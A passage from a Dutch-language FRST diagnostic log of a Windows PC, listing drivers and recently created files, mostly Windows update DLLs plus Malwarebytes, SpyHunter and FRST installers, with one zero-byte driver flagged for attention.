S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-01-30] ()
S3 fwlanusbn; C:\Windows\System32\DRIVERS\fwlanusbn.sys [552704 2009-03-20] (AVM GmbH) [Bestand niet getekend]
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [274696 2014-11-15] (Microsoft Corporation)
R1 MpKsl1f8ee86b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{59E671C3-534C-4383-B36F-779577A76229}\MpKsl1f8ee86b.sys [44928 2016-01-31] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124560 2014-11-15] (Microsoft Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [526392 2011-08-21] () [Bestand niet getekend]
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2012-12-13] (Apple, Inc.) [Bestand niet getekend]
U3 akdkd18u; C:\Windows\System32\Drivers\akdkd18u.sys [0 ] (Adaptec, Inc.) <==== AANDACHT (nul byte bestand/map)
S3 ALSysIO; \??\C:\Users\Thomas\AppData\Local\Temp\ALSysIO64.sys [X]
S3 CV2K1; system32\DRIVERS\cv2k1.sys [X]

==================== NetSvcs (gefilterd) ===================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

==================== Een Maand Aangemaakt bestanden en mappen ========

(Als een item is opgenomen in de fixlist, het bestand/map wordt verplaatst.)

2016-01-31 15:53 - 2016-01-31 15:53 - 00026460 _____ C:\Users\Thomas\Desktop\FRST.txt
2016-01-31 15:52 - 2016-01-31 15:53 - 00000000 ____D C:\FRST
2016-01-31 15:51 - 2016-01-31 15:51 - 02370560 _____ (Farbar) C:\Users\Thomas\Desktop\FRST64.exe
2016-01-31 13:04 - 2016-01-31 13:04 - 22908888 _____ (Malwarebytes ) C:\Users\Thomas\Downloads\mbam-setup-2.2.0.1024.exe
2016-01-30 21:58 - 2016-01-30 21:58 - 00000000 ____D C:\Users\Farah\AppData\Local\GWX
2016-01-30 21:52 - 2016-01-30 21:56 - 00000000 ____D C:\Users\Farah\AppData\Local\Google
2016-01-30 16:58 - 2016-01-30 16:58 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-30 16:41 - 2016-01-30 16:41 - 00000000 _____ C:\autoexec.bat
2016-01-30 16:40 - 2016-01-31 12:01 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Enigma Software Group
2016-01-30 16:39 - 2016-01-30 16:39 - 00022704 _____ C:\Windows\system32\Drivers\EsgScanner.sys
2016-01-30 16:38 - 2016-01-30 16:38 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Thomas\Downloads\SpyHunter-Installer.exe
2016-01-30 15:25 - 2015-12-11 19:57 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-01-30 15:25 - 2015-12-08 22:54 - 02285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2016-01-30 15:25 - 2015-12-08 22:54 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 01568768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 01325056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00902144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00815616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00740352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-30 15:25 - 2015-12-08 22:54 - 00739328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00541184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00358400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00154112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00970240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00509952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00193536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-30 15:25 - 2015-12-08 22:53 - 00153600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00079872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-01-30 15:25 - 2015-12-08 22:53 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-01-30 15:25 - 2015-12-08 20:07 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 02777088 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 01955328 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01575424 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 01307136 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 01232896 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01153024 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01026048 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00978944 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00666112 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00642048 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00624640 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00447488 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00292352 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00225792 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00224768 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00223744 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-01-30 15:25 - 2015-12-08 20:06 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-30 15:25 - 2015-12-08 20:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-01-30 15:25 - 2015-12-08 19:54 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-30 15:25 - 2015-12-08 19:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2016-01-30 15:24 - 2015-12-24 00:13 - 00387784 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-01-30 15:24 - 2015-12-23 23:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-01-30 15:24 - 2015-12-12 19:54 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-30 15:24 - 2015-12-12 19:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-30 15:24 - 2015-12-12 19:30 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-01-30 15:24 - 2015-12-12 19:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-01-30 15:24 - 2015-12-12 19:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-30 15:24 - 2015-12-12 19:15 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-30 15:24 - 2015-12-12 19:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-30 15:24 - 2015-12-12 19:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-01-30 15:24 - 2015-12-12 19:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-01-30 15:24 - 2015-12-12 19:07 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-30 15:24 - 2015-12-12 19:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-30 15:24 - 2015-12-12 19:07 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-01-30 15:24 - 2015-12-12 19:03 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-30 15:24 - 2015-12-12 19:02 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-01-30 15:24 - 2015-12-12 18:55 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-01-30 15:24 - 2015-12-12 18:51 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-30 15:24 - 2015-12-12 18:49 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-30 15:24 - 2015-12-12 18:44 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-01-30 15:24 - 2015-12-12 18:40 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-01-30 15:24 - 2015-12-12 18:39 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-01-30 15:24 - 2015-12-12 18:36 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-30 15:24 - 2015-12-12 18:36 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-01-30 15:24 - 2015-12-12 18:35 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-01-30 15:24 - 2015-12-12 18:33 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-30 15:24 - 2015-12-12 18:31 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-30 15:24 - 2015-12-12 18:30 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-01-30 15:24 - 2015-12-12 18:28 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-30 15:24 - 2015-12-12 18:27 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-30 15:24 - 2015-12-12 18:27 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-01-30 15:24 - 2015-12-12 18:27 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-30 15:24 - 2015-12-12 18:25 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-01-30 15:24 - 2015-12-12 18:23 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-30 15:24 - 2015-12-12 18:22 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-01-30 15:24 - 2015-12-12 18:21 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-01-30 15:24 - 2015-12-12 18:20 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-30 15:24 - 2015-12-12 18:19 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-30 15:24 - 2015-12-12 18:18 - 14457856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-30 15:24 - 2015-12-12 18:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-01-30 15:24 - 2015-12-12 18:12 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-01-30 15:24 - 2015-12-12 18:10 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-30 15:24 - 2015-12-12 18:10 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-30 15:24 - 2015-12-12 18:09 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-30 15:24 - 2015-12-12 18:08 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-01-30 15:24 - 2015-12-12 18:06 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-30 15:24 - 2015-12-12 18:02 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-01-30 15:24 - 2015-12-12 18:00 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-30 15:24 - 2015-12-12 18:00 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-30 15:24 - 2015-12-12 18:00 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-01-30 15:24 - 2015-12-12 18:00 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-30 15:24 - 2015-12-12 17:54 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-30 15:24 - 2015-12-12 17:42 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-01-30 15:24 - 2015-12-12 17:41 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-30 15:24 - 2015-12-12 17:38 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-30 15:24 - 2015-12-12 17:36 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-01-30 15:24 - 2015-12-08 22:53 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-30 15:24 - 2015-12-08 22:53 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksuser.dll
2016-01-30 15:24 - 2015-12-08 22:52 - 00312320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-30 15:24 - 2015-12-08 22:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-01-30 15:24 - 2015-12-08 20:07 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-30 15:24 - 2015-12-08 20:07 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-30 15:24 - 2015-12-08 20:07 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\ksuser.dll
2016-01-30 15:24 - 2015-12-08 20:04 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-01-30 15:24 - 2015-12-08 19:11 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmkaud.sys
2016-01-30 15:24 - 2015-12-08 18:58 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-30 15:24 - 2015-11-17 02:11 - 00025024 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-01-30 15:24 - 2015-11-17 02:08 - 01381376 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00705536 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00505856 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-01-30 15:24 - 2015-11-16 21:17 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-01-30 15:23 - 2015-12-30 20:08 - 05572544 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-30 15:23 - 2015-12-30 20:08 - 00154560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-01-30 15:23 - 2015-12-30 20:08 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-01-30 15:23 - 2015-12-30 20:05 - 01730496 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 01214464 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-01-30 15:23 - 2015-12-30 20:00 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-01-30 15:23 - 2015-12-30 19:59 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-01-30 15:23 - 2015-12-30 19:59 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-01-30 15:23 - 2015-12-30 19:59 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-01-30 15:23 - 2015-12-30 19:58 - 01461248 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-01-30 15:23 - 2015-12-30 19:58 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-01-30 15:23 - 2015-12-30 19:57 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-01-30 15:23 - 2015-12-30 19:57 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-01-30 15:23 - 2015-12-30 19:57 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-01-30 15:23 - 2015-12-30 19:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-01-30 15:23 - 2015-12-30 19:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-01-30 15:23 - 2015-12-30 19:55 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
